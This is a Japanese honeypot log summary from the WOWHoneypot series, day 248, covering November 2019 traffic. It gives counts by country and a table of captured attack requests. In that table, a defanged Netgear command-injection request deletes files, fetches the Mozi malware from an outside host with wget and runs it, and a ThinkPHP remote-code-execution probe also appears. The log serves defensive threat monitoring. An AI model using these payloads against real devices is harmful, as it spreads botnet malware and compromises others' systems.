23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(248日目)

2019/11/19(火)

トータルは4602件でした。

ハンティングログは以下です。

81.214.84[.]91 wget+hxxp[:]//114.253.86[.]59:7001/Mozi[.]m

www.virustotal.com

IPのロケーション別の件数は以下です。

イタリア 4002
スイス 450
中国 47
アメリ 43
フランス 9
オランダ 7
ブラジル 5
ロシア 5
イギリス 5
トルコ 3
ドイツ 4
インド 4
タイ 3
メキシコ 2
カナダ 2
アイスランド 1
ハンガリー 1
ベルギー 1
ルーマニア 1
南アフリカ 1
スロバキア 1
スペイン 1
オランダ 1
インドネシア 1
台湾 1
ベトナム 1

f:id:sec23:20191206173433p:plain

件数 概要 リクエス
4453 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
75 アクセス GET /
10 不明 GET /sadad24
10 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
10 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
10 Apache Struts2の調査 GET /login?from=%2F
10 Apache Struts2の調査 GET /login.action
4 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
2 調査 GET /script
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 調査 GET /version
1 DGN1000 Netgear ルータを狙うMirai亜種の通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//114.253.86.59:7001/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443